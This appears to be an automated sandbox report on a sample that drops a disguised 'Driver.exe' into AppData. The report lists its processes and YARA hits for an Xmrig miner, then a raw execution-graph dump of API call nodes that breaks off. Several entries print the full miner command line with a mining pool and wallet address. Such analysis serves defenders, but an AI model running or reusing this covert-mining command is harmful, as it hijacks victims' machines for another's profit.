                                                                              Start time:05:32:28
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 208 -p 7440 -ip 7440
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:05:32:28
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7440 -s 552
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:21
                                                                              Start time:05:32:30
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.3029846124.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:05:32:30
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:05:33:12
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:05:33:13
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7424 -s 876
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:25
                                                                              Start time:05:33:15
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:true

                                                                              Target ID:26
                                                                              Start time:05:33:15
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:27
                                                                              Start time:05:33:43
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:05:33:43
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 1712 -s 864
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:05:33:46
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.3496111858.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.3609636273.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.3763661932.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000002.4173054764.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:false

                                                                              Target ID:30
                                                                              Start time:05:33:46
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                                Execution Graph

                                                                                Execution Coverage:11.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:27.7%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:26
26484->26485 26485->26484 26486->26483 26499 7ff65594b190 26844 7ff65592255c 26499->26844 26501 7ff65594b1db 26502 7ff65594be93 26501->26502 26503 7ff65594b1ef 26501->26503 26653 7ff65594b20c 26501->26653 27083 7ff65594f390 26502->27083 26507 7ff65594b2db 26503->26507 26508 7ff65594b1ff 26503->26508 26503->26653 26506 7ff655952320 _handle_error 8 API calls 26512 7ff65594c350 26506->26512 26509 7ff65594b391 26507->26509 26515 7ff65594b2f5 26507->26515 26513 7ff65594b207 26508->26513 26514 7ff65594b2a9 26508->26514 26852 7ff6559222bc GetDlgItem 26509->26852 26510 7ff65594beba IsDlgButtonChecked 26511 7ff65594bec9 26510->26511 26517 7ff65594bed5 SendDlgItemMessageW 26511->26517 26518 7ff65594bef0 GetDlgItem IsDlgButtonChecked 26511->26518 26520 7ff65593aae0 48 API calls 26513->26520 26513->26653 26519 7ff65594b2cb EndDialog 26514->26519 26514->26653 26521 7ff65593aae0 48 API calls 26515->26521 26517->26518 26523 7ff6559362dc 35 API calls 26518->26523 26519->26653 26524 7ff65594b236 26520->26524 26525 7ff65594b313 SetDlgItemTextW 26521->26525 26526 7ff65594bf47 GetDlgItem 26523->26526 27106 7ff655921ec4 34 API calls _handle_error 26524->27106 26529 7ff65594b326 26525->26529 27102 7ff655922520 26526->27102 26528 7ff65594b408 GetDlgItem 26533 7ff65594b422 IsDlgButtonChecked IsDlgButtonChecked 26528->26533 26534 7ff65594b44f SetFocus 26528->26534 26539 7ff65594b340 GetMessageW 26529->26539 26529->26653 26532 7ff65594b246 26538 7ff65594b25c 26532->26538 26544 7ff65592250c SetDlgItemTextW 26532->26544 26533->26534 26540 7ff65594b4f2 26534->26540 26541 7ff65594b465 26534->26541 26536 7ff65594b3da 26542 7ff655921fa0 31 API calls 26536->26542 26556 7ff65594c363 26538->26556 26538->26653 26546 7ff65594b35e IsDialogMessageW 26539->26546 26539->26653 26545 7ff655928d04 33 API calls 26540->26545 26548 7ff65593aae0 48 API calls 26541->26548 26542->26653 26544->26538 26550 7ff65594b52c 26545->26550 26546->26529 26551 7ff65594b373 TranslateMessage DispatchMessageW 26546->26551 26547 
7ff65594bcc5 26552 7ff65593aae0 48 API calls 26547->26552 26553 7ff65594b46f 26548->26553 27107 7ff65594ef80 33 API calls 2 library calls 26550->27107 26551->26529 26557 7ff65594bcd6 SetDlgItemTextW 26552->26557 26566 7ff65592129c 33 API calls 26553->26566 26561 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26556->26561 26560 7ff65593aae0 48 API calls 26557->26560 26559 7ff65594b537 26564 7ff65593aae0 48 API calls 26559->26564 26565 7ff65594bd08 26560->26565 26567 7ff65594c368 26561->26567 26569 7ff65594b555 26564->26569 26578 7ff65592129c 33 API calls 26565->26578 26570 7ff65594b498 26566->26570 26571 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26567->26571 26574 7ff65593da98 48 API calls 26569->26574 26866 7ff65594f0a4 26570->26866 26580 7ff65594c36e 26571->26580 26584 7ff65594b568 26574->26584 26607 7ff65594bd31 26578->26607 26591 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26580->26591 26587 7ff65594f0a4 24 API calls 26584->26587 26588 7ff65594b578 26587->26588 26595 7ff655921fa0 31 API calls 26588->26595 26590 7ff65594bdda 26599 7ff65593aae0 48 API calls 26590->26599 26601 7ff65594c374 26591->26601 26605 7ff65594b586 26595->26605 26598 7ff65594b5ec 26610 7ff65594b61a 26598->26610 27109 7ff6559332a8 26598->27109 26612 7ff65594bde4 26599->26612 26600 7ff65594b4e8 26600->26598 27108 7ff65594fa80 33 API calls 2 library calls 26600->27108 26618 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26601->26618 26605->26580 26605->26600 26607->26590 26619 7ff65592129c 33 API calls 26607->26619 26880 7ff655932f58 26610->26880 26630 7ff65592129c 33 API calls 26612->26630 26624 7ff65594c37a 26618->26624 26625 7ff65594bd7f 26619->26625 26636 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26624->26636 26632 7ff65593aae0 48 API calls 26625->26632 26628 7ff65594b64c 26640 7ff655937fc4 SetCurrentDirectoryW 26628->26640 26629 7ff65594b634 GetLastError 26629->26628 26635 7ff65594be0d 26630->26635 26637 
7ff65594bd8a 26632->26637 26634 7ff65594b60e 27112 7ff655949d90 12 API calls _handle_error 26634->27112 26650 7ff65592129c 33 API calls 26635->26650 26641 7ff65594c380 26636->26641 26643 7ff655921150 33 API calls 26637->26643 26645 7ff65594b65e 26640->26645 26651 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26641->26651 26646 7ff65594bda2 26643->26646 26648 7ff65594b674 26645->26648 26649 7ff65594b665 GetLastError 26645->26649 26656 7ff655922034 33 API calls 26646->26656 26657 7ff65594b72b 26648->26657 26658 7ff65594b68b GetTickCount 26648->26658 26745 7ff65594b71c 26648->26745 26649->26648 26654 7ff65594be4e 26650->26654 26655 7ff65594c386 26651->26655 26653->26506 26665 7ff655921fa0 31 API calls 26654->26665 26659 7ff65592255c 61 API calls 26655->26659 26660 7ff65594bdbe 26656->26660 26661 7ff65594ba50 26657->26661 26669 7ff655936454 34 API calls 26657->26669 26892 7ff655924228 26658->26892 26663 7ff65594c3e4 26659->26663 26668 7ff655921fa0 31 API calls 26660->26668 26671 7ff65594b3b1 EndDialog 26661->26671 27121 7ff65592bd0c 33 API calls 26661->27121 26666 7ff65594c3e8 26663->26666 26675 7ff65594c3fd 26663->26675 26676 7ff65594c489 GetDlgItem SetFocus 26663->26676 26674 7ff65594be78 26665->26674 26684 7ff655952320 _handle_error 8 API calls 26666->26684 26678 7ff65594bdcc 26668->26678 26679 7ff65594b74e 26669->26679 26671->26536 26672 7ff65594bb79 26690 7ff65593aae0 48 API calls 26672->26690 26673 7ff65594ba75 27122 7ff655921150 26673->27122 26683 7ff655921fa0 31 API calls 26674->26683 26675->26666 26699 7ff65594c434 SendDlgItemMessageW 26675->26699 26688 7ff65594c4ba 26676->26688 26686 7ff655921fa0 31 API calls 26678->26686 27113 7ff65593b914 102 API calls 26679->27113 26681 7ff65594b6ba 26689 7ff655921fa0 31 API calls 26681->26689 26692 7ff65594be83 26683->26692 26693 7ff65594ca97 26684->26693 26686->26590 26701 7ff65592129c 33 API calls 26688->26701 26695 7ff65594b6c8 26689->26695 26696 7ff65594bba7 SetDlgItemTextW 26690->26696 26691 
7ff65594ba8a 26697 7ff65593aae0 48 API calls 26691->26697 26698 7ff655921fa0 31 API calls 26692->26698 26694 7ff65594b768 26700 7ff65593da98 48 API calls 26694->26700 26902 7ff655932134 26695->26902 26702 7ff655922534 26696->26702 26703 7ff65594ba97 26697->26703 26698->26536 26704 7ff65594c45d EndDialog 26699->26704 26709 7ff65594c454 26699->26709 26705 7ff65594b7aa GetCommandLineW 26700->26705 26706 7ff65594c4cc 26701->26706 26707 7ff65594bbc5 SetDlgItemTextW GetDlgItem 26702->26707 26708 7ff655921150 33 API calls 26703->26708 26704->26666 26710 7ff65594b869 26705->26710 26711 7ff65594b84f 26705->26711 27127 7ff6559380d8 33 API calls 26706->27127 26714 7ff65594bc13 26707->26714 26715 7ff65594bbf0 GetWindowLongPtrW SetWindowLongPtrW 26707->26715 26716 7ff65594baaa 26708->26716 26709->26704 27114 7ff65594ab54 33 API calls _handle_error 26710->27114 26728 7ff6559220b0 33 API calls 26711->26728 26918 7ff65594ce88 26714->26918 26715->26714 26721 7ff655921fa0 31 API calls 26716->26721 26717 7ff65594c4e0 26722 7ff65592250c SetDlgItemTextW 26717->26722 26727 7ff65594bab5 26721->26727 26729 7ff65594c4f4 26722->26729 26723 7ff65594b87a 27115 7ff65594ab54 33 API calls _handle_error 26723->27115 26724 7ff65594b704 26731 7ff65593204c 100 API calls 26724->26731 26725 7ff65594b6f5 GetLastError 26725->26724 26733 7ff655921fa0 31 API calls 26727->26733 26728->26710 26739 7ff65594c526 SendDlgItemMessageW FindFirstFileW 26729->26739 26736 7ff65594b711 26731->26736 26732 7ff65594ce88 163 API calls 26737 7ff65594bc3c 26732->26737 26738 7ff65594bac3 26733->26738 26734 7ff65594b88b 27116 7ff65594ab54 33 API calls _handle_error 26734->27116 26741 7ff655921fa0 31 API calls 26736->26741 27069 7ff65594f974 26737->27069 26750 7ff65593aae0 48 API calls 26738->26750 26743 7ff65594c57b 26739->26743 26837 7ff65594ca04 26739->26837 26740 7ff65594b89c 27117 7ff65593b9b4 102 API calls 26740->27117 26741->26745 26751 7ff65593aae0 48 API calls 26743->26751 26745->26657 26745->26672 26747 7ff65594b8b3 
27118 7ff65594fbdc 33 API calls 26747->27118 26748 7ff65594ca81 26748->26666 26749 7ff65594ce88 163 API calls 26764 7ff65594bc6a 26749->26764 26754 7ff65594badb 26750->26754 26755 7ff65594c59e 26751->26755 26753 7ff65594caa9 26757 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26753->26757 26765 7ff65592129c 33 API calls 26754->26765 26767 7ff65592129c 33 API calls 26755->26767 26756 7ff65594b8d2 CreateFileMappingW 26759 7ff65594b953 ShellExecuteExW 26756->26759 26760 7ff65594b911 MapViewOfFile 26756->26760 26761 7ff65594caae 26757->26761 26758 7ff65594bc96 27126 7ff655922298 GetDlgItem EnableWindow 26758->27126 26773 7ff65594b974 26759->26773 27119 7ff655953640 26760->27119 26768 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26761->26768 26764->26758 26769 7ff65594ce88 163 API calls 26764->26769 26778 7ff65594bb04 26765->26778 26766 7ff65594b3f5 26766->26547 26766->26671 26770 7ff65594c5cd 26767->26770 26771 7ff65594cab4 26768->26771 26769->26758 26772 7ff655921150 33 API calls 26770->26772 26777 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26771->26777 26774 7ff65594c5e8 26772->26774 26775 7ff65594b996 WaitForInputIdle 26773->26775 26776 7ff65594b9c3 26773->26776 26780 7ff65592e164 33 API calls 26774->26780 26781 7ff65594b9ab 26775->26781 26786 7ff65594b9dc UnmapViewOfFile CloseHandle 26776->26786 26787 7ff65594b9ef 26776->26787 26782 7ff65594caba 26777->26782 26778->26624 26779 7ff65594bb5a 26778->26779 26783 7ff655921fa0 31 API calls 26779->26783 26784 7ff65594c5ff 26780->26784 26781->26776 26785 7ff65594b9b1 Sleep 26781->26785 26790 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26782->26790 26783->26671 26788 7ff655921fa0 31 API calls 26784->26788 26785->26776 26785->26781 26786->26787 26787->26601 26789 7ff65594ba25 26787->26789 26791 7ff65594c60c 26788->26791 26793 7ff655921fa0 31 API calls 26789->26793 26792 7ff65594cac0 26790->26792 26791->26761 26795 7ff655921fa0 31 API calls 26791->26795 26796 
7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26792->26796 26794 7ff65594ba42 26793->26794 26797 7ff655921fa0 31 API calls 26794->26797 26798 7ff65594c673 26795->26798 26799 7ff65594cac6 26796->26799 26797->26661 26800 7ff65592250c SetDlgItemTextW 26798->26800 26802 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26799->26802 26801 7ff65594c687 FindClose 26800->26801 26803 7ff65594c797 SendDlgItemMessageW 26801->26803 26804 7ff65594c6a3 26801->26804 26805 7ff65594cacc 26802->26805 26806 7ff65594c7cb 26803->26806 27128 7ff65594a2cc 10 API calls _handle_error 26804->27128 26809 7ff65593aae0 48 API calls 26806->26809 26808 7ff65594c6c6 26810 7ff65593aae0 48 API calls 26808->26810 26811 7ff65594c7d8 26809->26811 26812 7ff65594c6cf 26810->26812 26814 7ff65592129c 33 API calls 26811->26814 26813 7ff65593da98 48 API calls 26812->26813 26817 7ff65594c6ec memcpy_s 26813->26817 26816 7ff65594c807 26814->26816 26815 7ff655921fa0 31 API calls 26818 7ff65594c783 26815->26818 26819 7ff655921150 33 API calls 26816->26819 26817->26771 26817->26815 26820 7ff65592250c SetDlgItemTextW 26818->26820 26821 7ff65594c822 26819->26821 26820->26803 26822 7ff65592e164 33 API calls 26821->26822 26823 7ff65594c839 26822->26823 26824 7ff655921fa0 31 API calls 26823->26824 26825 7ff65594c845 memcpy_s 26824->26825 26826 7ff655921fa0 31 API calls 26825->26826 26827 7ff65594c87f 26826->26827 26828 7ff655921fa0 31 API calls 26827->26828 26829 7ff65594c88c 26828->26829 26829->26782 26830 7ff655921fa0 31 API calls 26829->26830 26831 7ff65594c8f3 26830->26831 26832 7ff65592250c SetDlgItemTextW 26831->26832 26833 7ff65594c907 26832->26833 26833->26837 27129 7ff65594a2cc 10 API calls _handle_error 26833->27129 26835 7ff65594c932 26836 7ff65593aae0 48 API calls 26835->26836 26838 7ff65594c93c 26836->26838 26837->26666 26837->26748 26837->26753 26837->26799 26839 7ff65593da98 48 API calls 26838->26839 26841 7ff65594c959 memcpy_s 26839->26841 26840 7ff655921fa0 31 API calls 26842 
7ff65594c9f0 26840->26842 26841->26792 26841->26840 26843 7ff65592250c SetDlgItemTextW 26842->26843 26843->26837 26845 7ff65592256a 26844->26845 26846 7ff6559225d0 26844->26846 26845->26846 27130 7ff65593a4ac 26845->27130 26846->26501 26848 7ff65592258f 26848->26846 26849 7ff6559225a4 GetDlgItem 26848->26849 26849->26846 26850 7ff6559225b7 26849->26850 26850->26846 26851 7ff6559225be SetDlgItemTextW 26850->26851 26851->26846 26853 7ff655922334 26852->26853 26855 7ff6559222fc 26852->26855 27179 7ff6559223f8 GetWindowTextLengthW 26853->27179 26856 7ff65592129c 33 API calls 26855->26856 26857 7ff65592232a memcpy_s 26856->26857 26858 7ff655921fa0 31 API calls 26857->26858 26861 7ff655922389 26857->26861 26858->26861 26859 7ff6559223c8 26860 7ff655952320 _handle_error 8 API calls 26859->26860 26862 7ff6559223dd 26860->26862 26861->26859 26863 7ff6559223f0 26861->26863 26862->26528 26862->26671 26862->26766 26864 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26863->26864 26865 7ff6559223f5 26864->26865 27191 7ff65594ae1c PeekMessageW 26866->27191 26869 7ff65594f143 IsDlgButtonChecked IsDlgButtonChecked 26871 7ff65594f189 26869->26871 26872 7ff65594f1a4 IsDlgButtonChecked 26869->26872 26870 7ff65594f0f5 26875 7ff65594f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26870->26875 26871->26872 26873 7ff65594f1c6 IsDlgButtonChecked IsDlgButtonChecked 26872->26873 26874 7ff65594f1c3 26872->26874 26876 7ff65594f218 IsDlgButtonChecked 26873->26876 26877 7ff65594f1f3 IsDlgButtonChecked 26873->26877 26874->26873 26875->26869 26878 7ff655952320 _handle_error 8 API calls 26876->26878 26877->26876 26879 7ff65594b4a5 26878->26879 26879->26567 26879->26600 26881 7ff65593309d 26880->26881 26885 7ff655932f8e 26880->26885 26882 7ff655952320 _handle_error 8 API calls 26881->26882 26883 7ff6559330b3 26882->26883 26883->26628 26883->26629 26884 7ff655933077 26884->26881 26886 7ff655933684 56 API calls 26884->26886 26885->26884 26887 7ff65592129c 33 API calls 26885->26887 
26889 7ff6559330c8 26885->26889 27196 7ff655933684 26885->27196 26886->26881 26887->26885 26890 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26889->26890 26891 7ff6559330cd 26890->26891 26893 7ff655924255 26892->26893 26894 7ff65592426a 26893->26894 26895 7ff65592129c 33 API calls 26893->26895 26896 7ff655952320 _handle_error 8 API calls 26894->26896 26895->26894 26897 7ff6559242a1 26896->26897 26898 7ff655923c84 26897->26898 26899 7ff655923cab 26898->26899 27230 7ff65592710c 26899->27230 26901 7ff655923cbb memcpy_s 26901->26681 26905 7ff65593216a 26902->26905 26903 7ff65593219e 26906 7ff65593227f 26903->26906 26907 7ff655936a0c 49 API calls 26903->26907 26904 7ff6559321b1 CreateFileW 26904->26903 26905->26903 26905->26904 26908 7ff6559322af 26906->26908 26913 7ff6559220b0 33 API calls 26906->26913 26909 7ff655932209 26907->26909 26910 7ff655952320 _handle_error 8 API calls 26908->26910 26911 7ff655932246 26909->26911 26912 7ff65593220d CreateFileW 26909->26912 26914 7ff6559322c4 26910->26914 26911->26906 26915 7ff6559322d8 26911->26915 26912->26911 26913->26908 26914->26724 26914->26725 26916 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26915->26916 26917 7ff6559322dd 26916->26917 27242 7ff65594aa08 26918->27242 26920 7ff65594d1ee 26921 7ff655921fa0 31 API calls 26920->26921 26922 7ff65594d1f7 26921->26922 26924 7ff655952320 _handle_error 8 API calls 26922->26924 26923 7ff65593d22c 33 API calls 27039 7ff65594cf03 memcpy_s 26923->27039 26925 7ff65594bc2b 26924->26925 26925->26732 26926 7ff65594eefa 27330 7ff65592704c 47 API calls memcpy_s 26926->27330 26929 7ff65594ef00 27331 7ff65592704c 47 API calls memcpy_s 26929->27331 26931 7ff65594ef06 26935 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26931->26935 26933 7ff65594eeee 26934 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26933->26934 26936 7ff65594eef4 26934->26936 26938 7ff65594ef0c 26935->26938 27329 7ff65592704c 47 API calls memcpy_s 26936->27329 
26940 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26938->26940 26942 7ff65594ef12 26940->26942 26941 7ff65594ee4a 26943 7ff65594eed2 26941->26943 26944 7ff6559220b0 33 API calls 26941->26944 26947 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26942->26947 27327 7ff655921f80 33 API calls 3 library calls 26943->27327 26949 7ff65594ee77 26944->26949 26945 7ff65594eee8 27328 7ff655922004 33 API calls std::_Xinvalid_argument 26945->27328 26946 7ff6559213a4 33 API calls 26950 7ff65594dc3a GetTempPathW 26946->26950 26951 7ff65594ef18 26947->26951 27326 7ff65594abe8 33 API calls 3 library calls 26949->27326 26950->27039 26959 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26951->26959 26952 7ff6559362dc 35 API calls 26952->27039 26957 7ff65594ee8d 26964 7ff655921fa0 31 API calls 26957->26964 26968 7ff65594eea4 memcpy_s 26957->26968 26958 7ff655922520 SetDlgItemTextW 26958->27039 26962 7ff65594ef1e 26959->26962 26961 7ff65595bb8c 43 API calls 26961->27039 26966 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26962->26966 26963 7ff65594e7f3 26963->26943 26963->26945 26967 7ff6559521d0 33 API calls 26963->26967 26975 7ff65594e83b memcpy_s 26963->26975 26964->26968 26965 7ff655921fa0 31 API calls 26965->26943 26969 7ff65594ef24 26966->26969 26967->26975 26968->26965 26974 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26969->26974 26971 7ff65594aa08 33 API calls 26971->27039 26972 7ff6559220b0 33 API calls 26972->27039 26973 7ff65594ef6c 27334 7ff655922004 33 API calls std::_Xinvalid_argument 26973->27334 26979 7ff65594ef2a 26974->26979 26983 7ff6559220b0 33 API calls 26975->26983 27026 7ff65594eb8f 26975->27026 26977 7ff655921fa0 31 API calls 26977->26941 26978 7ff65594ef78 27336 7ff655922004 33 API calls std::_Xinvalid_argument 26978->27336 26988 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26979->26988 26980 7ff65594ef72 27335 7ff655921f80 33 API calls 3 library calls 26980->27335 26982 
